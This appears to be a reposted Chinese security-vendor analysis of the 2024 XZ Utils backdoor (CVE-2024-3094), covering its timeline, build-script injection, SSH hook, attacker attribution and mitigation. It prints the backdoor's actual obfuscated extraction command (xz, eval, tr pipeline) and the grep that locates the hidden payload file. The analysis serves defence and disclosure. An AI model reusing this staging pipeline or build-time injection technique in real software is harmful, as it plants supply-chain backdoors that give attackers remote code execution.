潜伏三年,核弹级危机一触即发,亚信安全深度分析XZ Utils后门事件

这篇具有很好参考价值的文章主要介绍了潜伏三年,核弹级危机一触即发,亚信安全深度分析XZ Utils后门事件。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

2024年3月29日星期五上午8点,有研究人员称xz/liblzma中的后门导致SSH服务器内存泄露,使得SSH服务异常(https://www.openwall.com/lists/oss-security/2024/03/29/4)。github中“xz”压缩工具主要由Larhzu和Jia Tan共同负责维护,他们已经合作发布了多个版本。然而,研究人员发现Jia Tan发布的5.6.0和5.6.1版本存在后门代码,该后门允许攻击者未经授权地使用SSH访问系统。这个漏洞编号为CVE-2024-3094,近期引起了广泛的关注和讨论。接下来将对此次攻击事件进行详细分析。

潜伏三年,核弹级危机一触即发,亚信安全深度分析XZ Utils后门事件,安全

漏洞概述

XZ Utils是一个高压缩比的数据压缩格式,广泛应用于各种Linux发行版中。在XZ Utils的5.6.0和5.6.1版本中,被研究人员发现存在恶意后门代码,这个后门代码可以被攻击者利用,通过SSH未经授权地访问系统。

这个恶意后门代码被嵌入在XZ Utils的两个测试文件中:tests/files/bad-3-corrupt_lzma2.xz和tests/files/good-large_compressed.lzma。攻击者通过修改这些文件中的代码,实现了一个复杂的后门机制,可以在OpenSSH服务器(SSHD)中注入恶意代码,从而允许攻击者发送任意的SSH载荷,并在身份验证之前执行这些载荷,有效地劫持整个受害机器。

攻击者画像

自2021年起,化名Jia Tan(JiaT75)的攻击者因涉及XZ Utils等项目的后门事件在GitHub上引起注意,直至2024年3月31日账户被封。通过长期贡献代码,Jia Tan在开源社区建立信誉,利用该信任植入恶意代码至包括libarchive和oss-fuzz在内的多个项目,展示出深厚的技术实力,他精通Linux系统、ChaCha20加密算法和IFUNC技术。攻击者的动机可能包括经济、政治或技术展示,极有可能属于有国家背景的,有组织有计划的行动。此次事件预示开源社区需警惕并采取措施,以应对潜在威胁。

漏洞影响范围

这个漏洞主要影响使用XZ Utils 5.6.0和5.6.1版本的系统,包括但不限于那些运行Fedora、Debian、Alpine、Kali、OpenSUSE和Arch Linux等发行版的系统。

xz后门构建过程

首先,通过执行build-to-host.m4文件,结合恶意代码运行,进而将加密的代码嵌入到“configure”脚本之中。

接着在执行“configure”脚本时,利用已经被混淆的代码进行操作,该过程涉及对“liblzma”链接器和编译器的标志进行调整,目的是为了干扰符号解析过程。

执行MakeFile时,触发了一个事件:“RsApublidecrypt@.al”符号被操纵,将其指向运行时环境中的另一个恶意代码,从而引发了潜在的安全威胁。

时间线

2021年

攻击者首先在2021年创建了一个GitHub账户,并在libarchive项目中提交了一个看似无害但实际可疑的补丁。这个补丁替换了一个安全的函数变体,可能引入了另一个漏洞。

2022年

2月6日,攻击者首次向XZ Utils项目提交了一个表面上合法的补丁,此举是他们获得项目信任的开端。随后,名为Jigar Kumar和Dennis Ens的新角色出现,开始向项目团队施加压力,要求合并该补丁,并提出增加一名新的项目维护者Jia Tan。在一系列交流和操作之后,Jigar Kumar神秘消失。

2023年

攻击者敦促Linux发行版尽快将他准备的软件包版本采用到他们的系统中,他找到了一位Fedora作者,并试图说服他将xz 5.6.x包含在基于rpm的发行版中,利用新版本的“xz”解决bug。ID为“krygorin4545”和“misoeater91”等化名的用户赞扬了所谓的错误修复,目的是虚假的宣传账户。

6月27日至28日,攻击者进行了进一步的更改,这些更改为可能的未来攻击奠定了基础。

2024年

2月15日,攻击者在XZ Utils项目的.gitignore文件中添加了一个忽略规则,用于忽略build-to-host.m4脚本文件。这个脚本文件将在实际发布版本中包含恶意的M4宏,用于在受害者机器上初始化后门的安装。

2月23日,攻击者在XZ Utils项目的两个测试文件中添加了混淆的二进制后门:tests/files/bad-3-corrupt_lzma2.xz和tests/files/good-large_compressed.lzma。

2月24日,攻击者发布了带有恶意build-to-host.m4脚本的5.6.0版本,使恶意后门完全可用。

3月9日,攻击者更新了后门的二进制文件,并发布了5.6.1版本。这两个版本都包含了恶意后门代码。

潜伏三年,核弹级危机一触即发,亚信安全深度分析XZ Utils后门事件,安全

代码分析

攻击者通过SSH与目标系统连接,使用特定的RSA密钥建立联系,这个密钥随后被提交给OpenSSH服务器(SSHD)。服务器利用RSA_public_decrypt函数来验证攻击者提供的RSA密钥。在这一过程中,恶意代码被注入到OpenSSH服务器,并对RSA_public_decrypt函数进行钩取。这个恶意钩取的代码负责检查由SSH客户端(即攻击者)完全控制的RSA公共模数("N"值)。然后,它使用一个硬编码的ChaCha20对称流密码作为解密密钥来解密"N"值。解密后的数据通过Ed448椭圆曲线签名算法进行验证,只有攻击者持有的私钥能生成有效的负载,因为后门仅包含用于验证的公钥。

潜伏三年,核弹级危机一触即发,亚信安全深度分析XZ Utils后门事件,安全

hook伪代码如上图所示,如果数据验证成功,恶意载荷会以shell命令的形式被执行;如果数据无效(如格式错误或签名无效),则会恢复到RSA_public_decrypt的原始实现。这允许攻击者在不被发现的情况下持续进行攻击。通过SSH,攻击者能够发送任意有效负载,在认证前就执行,从而劫持目标系统。这一攻击最终创建了一个名为liblzma_la-crc64-fast.o的后门文件,表明此次攻击使用了远程代码执行(RCE),而不是简单的身份验证绕过。

潜伏三年,核弹级危机一触即发,亚信安全深度分析XZ Utils后门事件,安全

潜伏三年,核弹级危机一触即发,亚信安全深度分析XZ Utils后门事件,安全

从上述代码中可以看到攻击者使用grep构建恶意软件名:grep -aErls "#{4}[[:alnum:]]{5}#{4}$" ./,执行结果是:./tests/files/bad-3-corrupt_lzma2.xz

最终恶意指令执行命令为:

xz -dc ./tests/files/good-large_compressed.lzma| eval $i| tail -c +31233| tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377" | xz -F raw --lzma1 -dc

最终在真正的感染部分目标文件liblzma_la-crc64_fast.o 和liblzma_la-crc32_fast.o,被链接了恶意的object文件。

值得一提的是恶意软件作者重新构造了函数get_cpuid,预留了一个参数“__builtin_frame_address”以获取函数返回地址。

从版本5.6.1中提取的Liblzma后门字符串(从内置trie中提取)如下所示:

潜伏三年,核弹级危机一触即发,亚信安全深度分析XZ Utils后门事件,安全

潜伏三年,核弹级危机一触即发,亚信安全深度分析XZ Utils后门事件,安全

潜伏三年,核弹级危机一触即发,亚信安全深度分析XZ Utils后门事件,安全

潜伏三年,核弹级危机一触即发,亚信安全深度分析XZ Utils后门事件,安全

潜伏三年,核弹级危机一触即发,亚信安全深度分析XZ Utils后门事件,安全

潜伏三年,核弹级危机一触即发,亚信安全深度分析XZ Utils后门事件,安全

潜伏三年,核弹级危机一触即发,亚信安全深度分析XZ Utils后门事件,安全

潜伏三年,核弹级危机一触即发,亚信安全深度分析XZ Utils后门事件,安全

潜伏三年,核弹级危机一触即发,亚信安全深度分析XZ Utils后门事件,安全

代码中存在“kill switch”机制将“yolAbejyiejuvnup=Evjtgvsh5okmkAvj”添加到环境变量/etc/environment中可以暂时终止后门,具体表现为他会加速sshd的退出。

恶意文件(liblzma_la-crc64-fast.o{212ffa0b24bb7d749532425a46764433})

潜伏三年,核弹级危机一触即发,亚信安全深度分析XZ Utils后门事件,安全

攻击者溯源

Jia Tan 历史提交活动范围

潜伏三年,核弹级危机一触即发,亚信安全深度分析XZ Utils后门事件,安全

Jia Tang近两年github提交记录如下表所示:

潜伏三年,核弹级危机一触即发,亚信安全深度分析XZ Utils后门事件,安全

larhzu近两年github提交记录如下表所示:

潜伏三年,核弹级危机一触即发,亚信安全深度分析XZ Utils后门事件,安全

从上述表格可看出代码提交时间分布于UTC+3、UTC+8与UTC+2,UTC+02时区与冬令时(2月和 11月)完美匹配,而UTC+03时区与夏令时(6 月、7 月和10月初)完美匹配。这与东欧发生的夏令时切换完全匹配;我们看到冬季(10 月最后一个周末之后)切换到 +02:00,夏季(3 月最后一个星期日之后)切换到 +03:00,怀疑攻击者位于东欧 (EET),还有以色列 (IST) 等国家,且攻击者有意伪造成中国人进行攻击,但所采用的攻击方法似乎是出自那些将英语作为母语的组织之手。这个时区与Lasse Collin和Jigar Kumar的工作时间相符合。

攻击者的gmail信息记录如下:

潜伏三年,核弹级危机一触即发,亚信安全深度分析XZ Utils后门事件,安全

处置建议

对于未受影响的系统,如Red Hat Enterprise Linux和Ubuntu等,建议保持警惕,及时更新系统和软件以防范类似漏洞。

同时,在互联网侧,推荐使用亚信安全“外部攻击面管理平台”排查资产操作系统及版本,探测是否有资产开启ssh高危服务,一键开启,排查无忧;在本地主机上,可使用安全工具检测是否存在恶意后门代码,并及时采取措施进行修复和缓解;使用命令行工具执行以下命令检查版本信息,受影响的用户立即将XZ Utils降级至更早版本,并重启机器或重启OpenSSH服务器以移除补丁代码。

如果无法进行降级,可以通过“kill switch”机制禁用恶意后门功能,此处提供两种检测方式:

  1. xz --version(不推荐)

  2. for xz_p in $(type -a xz | awk '{print $NF}' | uniq); do strings "$xz_p" | grep "xz (XZ Utils)" || echo "No match found for $xz_p"; done

    这段脚本作用是搜索系统上所有的“xz”可执行文件,并尝试确认它们的版本信息。(来源:@Kostastsale)

IOC:

潜伏三年,核弹级危机一触即发,亚信安全深度分析XZ Utils后门事件,安全

潜伏三年,核弹级危机一触即发,亚信安全深度分析XZ Utils后门事件,安全

公开yara检测规则:

因篇幅受限,这部分略,详情可以进入官方公众号【亚信安全】本篇推文获取。

亚信安全威胁情报中心

亚信安全威胁情报中心深耕威胁情报领域多年,具备国内一流的威胁情报分析、人工智能及大数据团队,依托公司国际基因与多元化数据来源优势,对全球威胁事件及时跟踪与深度解析。威胁情报中心聚焦实战化、场景化情报,以数据驱动威胁情报运营,使用Ai赋能威胁情报生产、运营全流程,在挖矿治理、网络钓鱼检测、黑客工具检测、勒索治理、勒索泄密点检测等方面处于国内领先地位。威胁情报中心首创威胁情报云端联动小时级响应机制,为客户提供“一点触达、全网免疫”的体验。文章来源地址https://www.toymoban.com/news/detail-860050.html

到了这里,关于潜伏三年,核弹级危机一触即发,亚信安全深度分析XZ Utils后门事件的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包赞助服务器费用

相关文章

  • 【核弹级安全事件】XZ Utils库中发现秘密后门,影响主要Linux发行版,软件供应链安全大事件

    【核弹级安全事件】XZ Utils库中发现秘密后门,影响主要Linux发行版,软件供应链安全大事件

    Red Hat 发布了一份“紧急安全警报”,警告称两款流行的数据压缩库XZ Utils(先前称为LZMA Utils)的两个版本已被植入恶意代码后门,这些代码旨在允许未授权的远程访问。 此次软件供应链攻击被追踪为 CVE-2024-3094 ,其CVSS评分为 10.0 ,表明其严重性极高。它影响了XZ Utils的5.6

    2024年04月15日
    浏览(6)
  • 外包干了三年,算是废了...

    外包干了三年,算是废了...

    先说一下自己的情况。大专生,19年通过校招进入湖南某软件公司,干了接近3年的测试,今年年上旬,感觉自己不能够在这样下去了,长时间呆在一个舒适的环境会让一个人堕落!而我已经在一个企业干了三年,已经让我变得不思进取,谈了一年半年的女朋友也因为我的心态

    2023年04月09日
    浏览(25)
  • 在外包干了三年,我废了……不吹不黑!

    在外包干了三年,我废了……不吹不黑!

    没错,我也干过外包,一干就是三年,三年后,我废了…… 虽说废的不是很彻底,但那三年我几乎是出差了三年、玩了三年、荒废了三年,那三年,我的技术能力几乎是零成长的。 说起这段三年的外包经历,也并不是没有收获,只是技术能力确实是没有什么提升的,为什么

    2024年02月05日
    浏览(12)
  • 阿里三年功能测试的一些感悟

    功能测试是测试工程师的基础功,很多人功能测试还做不好,就想去做性能测试、自动化测试。很多人对功能测试的理解就是点点点,如何自己不用心去悟,去研究,那么你的职业生涯也就停留在点点点上了。在这里,我把我对功能测试的理解写下来。 1、常用的 sql 语句一定

    2024年02月13日
    浏览(7)
  • 校园棒球三年发展计划·棒球1号位

    校园棒球运动的普及 为了满足校园棒球运动的普及,必须采取切实可行的措施,从学生的实际需求出发,采取灵活多变的手段,营造一个温馨愉快的环境,引导学生参与到这项运动中来,培养他们的团队精神和合作意识。 首先,在校园内广泛宣传和推广棒球运动,可以通过

    2024年02月11日
    浏览(11)
  • 近3三年多模态情感分析论文及其代码

    在CMU-MOSE数据集排行榜 CMU-MOSEI Benchmark (Multimodal Sentiment Analysis) | Papers With Code 在MOSI数据集排行榜 MOSI Benchmark (Multimodal Sentiment Analysis) | Papers With Code 《M-SENA: An Integrated Platform for Multimodal Sentiment Analysis》 ACL;ACL ; star:317;2022 UniMSE: Towards Unified Multimodal Sentiment Analysis and Emotion Re

    2024年02月12日
    浏览(9)
  • 听我一句劝,别去外包,干了三年,废了....

    听我一句劝,别去外包,干了三年,废了....

    先说一下自己的情况,大专生,18年通过校招进入湖南某软件公司,干了接近4年的功能测试,今年年初,感觉自己不能够在这样下去了,长时间呆在一个舒适的环境会让一个人堕落!而我已经在一个企业干了四年的功能测试,已经让我变得不思进取,谈了2年的女朋友也因为我

    2023年04月25日
    浏览(17)
  • iPhone辐射超标,发布三年突然禁售了

    iPhone辐射超标,发布三年突然禁售了

    昨晚 iPhone 15 预售大家抢到了吗? 虽然13日发布会后大家的反应十分冷静,但身体还是很诚实,官网都排到6-7周以后了... 在大伙都争着第一波尝鲜的时候,有一个地方正准备 禁售 iPhone  。 不用想肯定是欧盟某个国家啦,这两年的 Type-C、应用侧载、可拆卸电池...搞事就没停过

    2024年02月08日
    浏览(15)
  • 技术变革下职业危机

    技术变革下职业危机

    方向一:技术变革 1.人工智能(AI):AI技术的快速发展正在改变各个行业。AI在医疗诊断、金融分析、客户服务以及物流管理等方面都有广泛应用,提高了效率和准确性。但同时也引发了一些道德和道德问题,比如隐私和人机关系等。 2.物联网(IoT):物联网是指通过互联网

    2024年01月25日
    浏览(12)
  • 也谈35岁危机

    现在互联网行业风声鹤唳,大小厂都在瘦身以求过冬自保。而IT行业一直以来的35岁危机变得更加严峻,大家往往在抱怨政府监管不力,导致企业年龄歧视愈演愈烈。但更深层次的原因是什么,大龄员工如何保持竞争力,如何在当前环境下快速塑造竞争力。 本质原因 当前互联

    2023年04月17日
    浏览(7)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包